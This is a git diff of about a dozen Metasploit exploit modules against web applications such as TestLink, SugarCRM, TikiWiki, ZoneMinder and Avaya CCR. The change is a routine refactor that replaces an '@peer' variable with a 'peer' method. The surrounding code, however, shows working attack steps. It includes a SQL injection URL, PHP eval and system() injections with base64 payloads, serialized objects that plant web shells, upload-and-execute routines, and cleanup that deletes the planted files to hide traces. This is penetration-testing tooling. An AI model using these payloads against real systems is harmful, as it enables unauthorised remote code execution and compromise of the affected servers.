diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb
index 807ad86423..5a04dceeaf 100644
--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -159,16 +159,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     # Get Tomcat installation path
-    print_status("#{@peer} - Retrieving Tomcat installation path...")
+    print_status("#{peer} - Retrieving Tomcat installation path...")
 
     if install_path.nil?
-      fail_with(Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
+      fail_with(Failure::NotVulnerable, "#{peer} - Unable to retrieve the Tomcat installation path")
     end
 
-    print_good("#{@peer} - Tomcat installed on #{install_path}")
+    print_good("#{peer} - Tomcat installed on #{install_path}")
 
     if target['Platform'] == "java"
       exploit_java
@@ -178,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_java
-    print_status("#{@peer} - Uploading WAR file")
+    print_status("#{peer} - Uploading WAR file")
     app_base = rand_text_alphanumeric(4+rand(32-4))
 
     war = payload.encoded_war({ :app_name => app_base }).to_s
@@ -195,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
       select(nil, nil, nil, 2)
 
       # Now make a request to trigger the newly deployed war
-      print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
       res = send_request_cgi(
         {
           'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
@@ -209,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_native
-    print_status("#{@peer} - Uploading executable file")
+    print_status("#{peer} - Uploading executable file")
     exe = payload.encoded_exe
     exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
     if target['Platform'] == "win"
diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb
index 6e2e543fe8..4a0d8c89b6 100644
--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -152,34 +152,34 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = normalize_uri(target_uri.path)
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
 
     # register an account
     user  = rand_text_alphanumeric(rand(10)+6)
-    print_status("#{@peer} - Registering user (#{user})")
+    print_status("#{peer} - Registering user (#{user})")
     res   = register(base, user, user)
     if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
-      print_status("#{@peer} - Registered successfully")
+      print_status("#{peer} - Registered successfully")
     else
-      print_error("#{@peer} - Registration failed")
+      print_error("#{peer} - Registration failed")
       return
     end
 
     # login
-    print_status("#{@peer} - Authenticating user (#{user})")
+    print_status("#{peer} - Authenticating user (#{user})")
     res   = login(base, user, user)
     if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
-      print_status("#{@peer} - Authenticated successfully")
+      print_status("#{peer} - Authenticated successfully")
     else
-      print_error("#{@peer} - Authentication failed")
+      print_error("#{peer} - Authentication failed")
       return
     end
 
     # set id and table name
     id    = rand(1000)+1
     table = 'nodes_hierarchy'
-    print_status("#{@peer} - Setting id (#{id}) and table name (#{table})")
+    print_status("#{peer} - Setting id (#{id}) and table name (#{table})")
     begin
       res = send_request_cgi({
         'method'  => 'GET',
@@ -187,35 +187,35 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie' => datastore['COOKIE'],
       })
       if res and res.code == 200
-        print_status("#{@peer} - Setting id and table name successfully")
+        print_status("#{peer} - Setting id and table name successfully")
       else
-        print_error("#{@peer} - Setting id and table name failed")
+        print_error("#{peer} - Setting id and table name failed")
         return
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
-    print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
+    print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
     fname  = rand_text_alphanumeric(rand(10)+6) + '.php'
     php    = %Q|<?php #{payload.encoded} ?>|
     begin
       res    = upload(base, fname, php)
       if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
-        print_good("#{@peer} - File uploaded successfully")
+        print_good("#{peer} - File uploaded successfully")
       else
-        print_error("#{@peer} - Uploading PHP payload failed")
+        print_error("#{peer} - Uploading PHP payload failed")
         return
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # attempt to retrieve real file name from directory index
-    print_status("#{@peer} - Retrieving real file name from directory index.")
+    print_status("#{peer} - Retrieving real file name from directory index.")
     begin
       res = send_request_cgi({
         'method' => 'GET',
@@ -223,19 +223,19 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
         @token = $1
-        print_good("#{@peer} - Successfully retrieved file name (#{@token})")
+        print_good("#{peer} - Successfully retrieved file name (#{@token})")
       else
-        print_error("#{@peer} - Could not retrieve file name from directory index.")
+        print_error("#{peer} - Could not retrieve file name from directory index.")
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
     # attempt to retrieve real file name from the database
     if @token.nil?
-      print_status("#{@peer} - Retrieving real file name from the database.")
+      print_status("#{peer} - Retrieving real file name from the database.")
       sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
       begin
         res = send_request_cgi({
@@ -245,26 +245,26 @@ class Metasploit3 < Msf::Exploit::Remote
         })
         if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
           @token = $1
-          print_good("#{@peer} - Successfully retrieved file name (#{@token})")
+          print_good("#{peer} - Successfully retrieved file name (#{@token})")
         else
-          print_error("#{@peer} - Could not retrieve file name from the database.")
+          print_error("#{peer} - Could not retrieve file name from the database.")
           return
         end
       rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        print_error("#{@peer} - Connection failed")
+        print_error("#{peer} - Connection failed")
         return
       end
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (#{@token}.php)")
+    print_status("#{peer} - Executing payload (#{@token}.php)")
     begin
       send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return
     end
 
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
index e9c65406d0..20d4a365d3 100644
--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if res and res.headers['Set-Cookie']
       cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
     else
-      fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+      fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
     end
 
     cookie
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
         login[name] = value
       end
     else
-      fail_with(Failure::Unknown, "#{@peer} - Unable to find the hidden fieldset required for login")
+      fail_with(Failure::Unknown, "#{peer} - Unable to find the hidden fieldset required for login")
     end
 
     # Add the rest of fields required for login
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
       cookie_cred = "#{cookie}; #{user}; #{pass}"
     else
       cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
-      fail_with(Failure::Unknown, "#{@peer} - Unable to login with \"#{cred}\"")
+      fail_with(Failure::Unknown, "#{peer} - Unable to login with \"#{cred}\"")
     end
 
     return cookie_cred
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
         fields[n] = v
       end
     else
-      fail_with(Failure::Unknown, "#{@peer} - Cannot get necessary fields before posting a comment")
+      fail_with(Failure::Unknown, "#{peer} - Cannot get necessary fields before posting a comment")
     end
 
     # Generate enough URLs to trigger spam logging
@@ -206,18 +206,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     @base = normalize_uri(target_uri.path)
     @base << '/' if @base[-1, 1] != '/'
 
-    print_status("#{@peer} - Getting cookie")
+    print_status("#{peer} - Getting cookie")
     cookie = get_cookie
 
-    print_status("#{@peer} - Logging in")
+    print_status("#{peer} - Logging in")
     cred = login(cookie)
 
-    print_status("#{@peer} - Triggering spam logging")
+    print_status("#{peer} - Triggering spam logging")
     inject_exec(cred)
 
     handler
diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb
index 0426621390..c353fbda93 100644
--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -86,9 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
+    print_status("#{peer} - Exploiting the preg_replace() to execute PHP code")
     res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
   end
 end
diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb
index 652c0e135f..ce2340c4be 100644
--- a/modules/exploits/unix/webapp/hastymail_exec.rb
+++ b/modules/exploits/unix/webapp/hastymail_exec.rb
@@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
     @session_id = ""
-    @peer = "#{rhost}:#{rport}"
 
     login
 
     if not @session_id or @session_id.empty?
-      print_error "#{@peer} - Authentication failed"
+      print_error "#{peer} - Authentication failed"
       return Exploit::CheckCode::Unknown
     end
 
@@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 303
       @session_id = res["Set-Cookie"]
-      print_good "#{@peer} - Authentication successful"
+      print_good "#{peer} - Authentication successful"
     end
   end
 
@@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
     @session_id = ""
-    @peer = "#{rhost}:#{rport}"
 
-    print_status "#{@peer} - Trying login"
+    print_status "#{peer} - Trying login"
     login
 
     if not @session_id or @session_id.empty?
-      print_error "#{@peer} - Authentication failed"
+      print_error "#{peer} - Authentication failed"
       return
     end
 
-    print_status "#{@peer} - Authentication successfully, trying to exploit"
+    print_status "#{peer} - Authentication successfully, trying to exploit"
 
     data = "rs=passthru&"
     data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200 or not res.body =~ /\+/
-      print_error "#{@peer} - Exploitation failed"
+      print_error "#{peer} - Exploitation failed"
       return
     end
 
diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
index 36aa2e90c1..d3d21d0547 100644
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def cookie_prefix
-    print_status("#{@peer} - Checking for cookie prefix")
+    print_status("#{peer} - Checking for cookie prefix")
     cookie_prefix = ""
     res = send_request_cgi(
       {
@@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
       })
 
     if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
-      print_status("#{@peer} - Cookie prefix #{$1} found")
+      print_status("#{peer} - Cookie prefix #{$1} found")
       cookie_prefix = $1
     end
     return cookie_prefix
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
     res = send_request_cgi(
       {
@@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
     if client.type == "meterpreter"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{@upload_php}")
+        print_warning("#{peer} - Deleting #{@upload_php}")
         client.fs.file.rm(@upload_php)
-        print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+        print_good("#{peer} - #{@upload_php} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
 
   def exploit
     @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
-    @peer = "#{rhost}:#{rport}"
 
     # get_write_exec_payload uses a function, which limits our ability to support
     # Linux payloads, because that requires a space:
@@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
 
-    print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
 
     res = send_request_cgi(
     {
@@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}")
+      print_error("#{peer} - Exploit failed: #{res.code}")
       return
     end
 
-    print_status("#{@peer} - Executing the payload #{@upload_php}")
+    print_status("#{peer} - Executing the payload #{@upload_php}")
 
     res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 
diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb
index 31558a3285..1f31db9b3d 100644
--- a/modules/exploits/unix/webapp/php_charts_exec.rb
+++ b/modules/exploits/unix/webapp/php_charts_exec.rb
@@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
 
     base  = target_uri.path
     base << '/' if base[-1, 1] != '/'
-    @peer = "#{rhost}:#{rport}"
+
     code  = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
     rand_key_value = rand_text_alphanumeric(rand(10)+6)
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{code.length} bytes)")
+    print_status("#{peer} - Sending payload (#{code.length} bytes)")
     begin
       res = send_request_cgi({
         'method' => 'GET',
         'uri'    => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
       })
       if res and res.code == 500
-        print_good("#{@peer} - Payload sent successfully")
+        print_good("#{peer} - Payload sent successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-        fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+        fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end
diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
index 466a66462e..713de00e18 100644
--- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb
+++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
 
     if res and res.code == 404
-      print_error("#{@peer} - The upload most likely failed")
+      print_error("#{peer} - The upload most likely failed")
       return
     end
 
@@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     uri = normalize_uri(target_uri.path)
     uri << '/' if uri[-1,1] != '/'
     base = File.dirname("#{uri}.")
@@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     p = get_write_exec_payload(:unlink_self=>true)
 
-    print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
+    print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
     res = upload_php(base, php_fname, p, folder_name)
 
     if not res
-      print_error("#{@peer} - No response from server")
+      print_error("#{peer} - No response from server")
       return
     end
 
-    print_status("#{@peer} - Executing '#{php_fname}'...")
+    print_status("#{peer} - Executing '#{php_fname}'...")
     exec_php(base, res)
   end
 end
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
index cb3ea483f7..1a540d4a13 100644
--- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
       f = "pathCache.php"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{f}")
+        print_warning("#{peer} - Deleting #{f}")
         client.fs.file.rm(f)
-        print_good("#{@peer} - #{f} removed to stay ninja")
+        print_good("#{peer} - #{f} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
@@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     base = normalize_uri(target_uri.path)
 
-    @peer = "#{rhost}:#{rport}"
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
@@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
       return
     end
 
     if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
       session_id = $1
     else
-      print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+      print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
       return
     end
 
-    print_status("#{@peer} - Login successful with #{username}:#{password}")
+    print_status("#{peer} - Login successful with #{username}:#{password}")
 
     data = "module=Contacts&"
     data << "Contacts2_CONTACT_offset=1&"
@@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
     data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
 
-    print_status("#{@peer} - Exploiting the unserialize()")
+    print_status("#{peer} - Exploiting the unserialize()")
 
     res = send_request_cgi(
     {
@@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}")
+      print_error("#{peer} - Exploit failed: #{res.code}")
       return
     end
 
-    print_status("#{@peer} - Executing the payload")
+    print_status("#{peer} - Executing the payload")
 
     res = send_request_cgi(
     {
@@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 
diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
index bd1e4f3eec..a476b9b900 100644
--- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
@@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
     if client.type == "meterpreter"
       client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
       begin
-        print_warning("#{@peer} - Deleting #{@upload_php}")
+        print_warning("#{peer} - Deleting #{@upload_php}")
         client.fs.file.rm(@upload_php)
-        print_good("#{@peer} - #{@upload_php} removed to stay ninja")
+        print_good("#{peer} - #{@upload_php} removed to stay ninja")
       rescue
-        print_error("#{@peer} - Unable to remove #{f}")
+        print_error("#{peer} - Unable to remove #{f}")
       end
     end
   end
@@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
     base = target_uri.path
     base << '/' if base[-1, 1] != '/'
     @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
-    @peer = "#{rhost}:#{rport}"
 
-    print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
+    print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
 
     res = send_request_cgi(
       'uri' => normalize_uri(base, "tiki-rss_error.php")
@@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     else
       tiki_path = $1
-      print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
+      print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
     end
 
     php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
     printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
     printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
 
-    print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
+    print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
 
     res = send_request_cgi(
     {
@@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if not res or res.code != 200
-      print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
+      print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
       return
     end
 
-    print_status("#{@peer} - Executing the payload #{@upload_php}")
+    print_status("#{peer} - Executing the payload #{@upload_php}")
 
     res = send_request_cgi(
     {
@@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res
-      print_error("#{@peer} - Payload execution failed: #{res.code}")
+      print_error("#{peer} - Payload execution failed: #{res.code}")
       return
     end
 
diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
index 211fdcb0d6..b8daa7a0c7 100644
--- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
+++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
@@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
-    @peer    = "#{rhost}:#{rport}"
     base     = target_uri.path
     base    << '/' if base[-1, 1] != '/'
     cookie   = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
     command  = Rex::Text.uri_encode(payload.encoded)
 
     # login
-    print_status("#{@peer} - Authenticating as user '#{user}'")
+    print_status("#{peer} - Authenticating as user '#{user}'")
     begin
       res = send_request_cgi({
         'method' => 'POST',
@@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => "#{data}",
       })
       if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
-        fail_with(Failure::NoAccess, "#{@peer} - Authentication failed")
+        fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
-    print_good("#{@peer} - Authenticated successfully")
+    print_good("#{peer} - Authenticated successfully")
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{command.length} bytes)")
+    print_status("#{peer} - Sending payload (#{command.length} bytes)")
     begin
       res = send_request_cgi({
         'method'    => 'POST',
@@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'cookie'    => "#{cookie}"
       })
       if res and res.code == 200
-        print_good("#{@peer} - Payload sent successfully")
+        print_good("#{peer} - Payload sent successfully")
       else
-        fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
+        fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
     end
 
   end
diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
index 3469695d84..e9611d2240 100644
--- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
+++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
@@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
     cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
 
     begin
-      print_warning("#{@peer} - Removing #{@payload_path}")
+      print_warning("#{peer} - Removing #{@payload_path}")
       cli.fs.file.rm(@payload_path)
-      print_good("#{@peer} - #{@payload_path} deleted")
+      print_good("#{peer} - #{@payload_path} deleted")
     rescue ::Exception => e
       print_error("Unable to delete #{@payload_path}: #{e.message}")
     end
@@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
-
     # Generate the ASPX containing the EXE containing the payload
     exe = generate_payload_exe
     aspx = Msf::Util::EXE.to_exe_aspx(exe)
@@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # UPLOAD
     #
     attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
-    print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
+    print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
 
     res = send_request_cgi({
       'uri'          => attack_url,
@@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_url = ""
     @payload_path = ""
     if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
-      print_good("#{@peer} - Payload uploaded successfuly")
+      print_good("#{peer} - Payload uploaded successfuly")
     else
-      print_error("#{@peer} - Payload upload failed")
+      print_error("#{peer} - Payload upload failed")
       return
     end
 
@@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
       @payload_path = $1
-      print_status("#{@peer} - Payload stored on #{@payload_path}")
+      print_status("#{peer} - Payload stored on #{@payload_path}")
     else
-      print_error("#{@peer} - The payload file path couldn't be retrieved")
+      print_error("#{peer} - The payload file path couldn't be retrieved")
     end
 
     if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
       payload_url = URI($1).path
     else
-      print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!")
+      print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
       return
     end
 
@@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #
     # EXECUTE
     #
-    print_status("#{@peer} - Executing #{payload_url}...")
+    print_status("#{peer} - Executing #{payload_url}...")
 
     res = send_request_cgi({
       'uri'          =>  payload_url,
@@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
     }, 20)
 
     if (!res or (res and res.code != 200))
-      print_error("#{@peer} - Execution failed on #{payload_url} [No Response]")
+      print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
       return
     end
 
diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb
index 773d860001..46bc7f86a2 100644
--- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb
+++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb
@@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
     # New lines are handled on the vuln app and payload is corrupted
